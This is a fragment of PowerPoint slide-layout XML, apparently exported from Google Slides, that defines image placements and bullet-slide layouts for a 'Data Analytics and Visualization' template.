            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="744" name="Google Shape;744;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="745" name="Google Shape;745;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;746;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="747" name="Google Shape;747;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>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39. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 748"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749" name="Google Shape;749;p40"/>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4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51" name="Google Shape;751;p4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52" name="Google Shape;752;p4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53" name="Google Shape;753;p4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54" name="Google Shape;754;p4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55" name="Google Shape;755;p4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56" name="Google Shape;756;p40"/>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57" name="Google Shape;757;p40"/>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40"/>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59" name="Google Shape;759;p40"/>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40"/>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1" name="Google Shape;761;p40"/>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40"/>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3" name="Google Shape;763;p40"/>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40"/>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5" name="Google Shape;765;p40"/>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40"/>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7" name="Google Shape;767;p40"/>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40"/>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69" name="Google Shape;769;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="Google Shape;770;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="771" name="Google Shape;771;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="772" name="Google Shape;772;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="773" name="Google Shape;773;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="774" name="Google Shape;774;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1390"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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4. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p5"/>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39" name="Google Shape;39;p5"/>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0" name="Google Shape;40;p5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Google Shape;41;p5"/>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42" name="Google Shape;42;p5"/>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Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;43;p5"/>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4" name="Google Shape;44;p5"/>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 name="Google Shape;45;p5"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p5"/>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40. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 776"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p41"/>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4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79" name="Google Shape;779;p4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80" name="Google Shape;780;p4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81" name="Google Shape;781;p4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82" name="Google Shape;782;p4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83" name="Google Shape;783;p4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84" name="Google Shape;784;p41"/>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85" name="Google Shape;785;p41"/>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41"/>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87" name="Google Shape;787;p41"/>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41"/>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89" name="Google Shape;789;p41"/>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41"/>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1" name="Google Shape;791;p41"/>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41"/>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3" name="Google Shape;793;p41"/>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41"/>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5" name="Google Shape;795;p41"/>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41"/>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97" name="Google Shape;797;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798" name="Google Shape;798;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="799" name="Google Shape;799;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="800" name="Google Shape;800;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Google Shape;801;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Google Shape;802;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520979" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="803" name="Google Shape;803;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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41. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 804"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p42"/>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4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07" name="Google Shape;807;p4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08" name="Google Shape;808;p4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809" name="Google Shape;809;p4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810" name="Google Shape;810;p4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11" name="Google Shape;811;p4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12" name="Google Shape;812;p42"/>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13" name="Google Shape;813;p42"/>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42"/>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15" name="Google Shape;815;p42"/>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42"/>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17" name="Google Shape;817;p42"/>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42"/>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19" name="Google Shape;819;p42"/>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42"/>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1" name="Google Shape;821;p42"/>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42"/>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3" name="Google Shape;823;p42"/>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42"/>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25" name="Google Shape;825;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="826" name="Google Shape;826;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="827" name="Google Shape;827;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="829" name="Google Shape;829;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="830" name="Google Shape;830;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="831" name="Google Shape;831;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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42. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 832"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;p43"/>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4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35" name="Google Shape;835;p4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36" name="Google Shape;836;p4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837" name="Google Shape;837;p4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838" name="Google Shape;838;p4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39" name="Google Shape;839;p4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0" name="Google Shape;840;p43"/>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1" name="Google Shape;841;p43"/>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43"/>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3" name="Google Shape;843;p43"/>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43"/>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5" name="Google Shape;845;p43"/>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43"/>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7" name="Google Shape;847;p43"/>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43"/>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9" name="Google Shape;849;p43"/>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43"/>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51" name="Google Shape;851;p43"/>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43"/>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53" name="Google Shape;853;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Google Shape;854;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="855" name="Google Shape;855;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="856" name="Google Shape;856;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="857" name="Google Shape;857;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="858" name="Google Shape;858;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="859" name="Google Shape;859;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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43. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 860"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;p4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62" name="Google Shape;862;p4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63" name="Google Shape;863;p4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864" name="Google Shape;864;p4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865" name="Google Shape;865;p4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66" name="Google Shape;866;p4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67" name="Google Shape;867;p44"/>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44"/>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69" name="Google Shape;869;p44"/>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44"/>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1" name="Google Shape;871;p44"/>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44"/>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3" name="Google Shape;873;p44"/>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44"/>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5" name="Google Shape;875;p44"/>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44"/>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7" name="Google Shape;877;p44"/>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44"/>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9" name="Google Shape;879;p44"/>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44"/>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81" name="Google Shape;881;p44"/>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44"/>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83" name="Google Shape;883;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="884" name="Google Shape;884;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="885" name="Google Shape;885;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
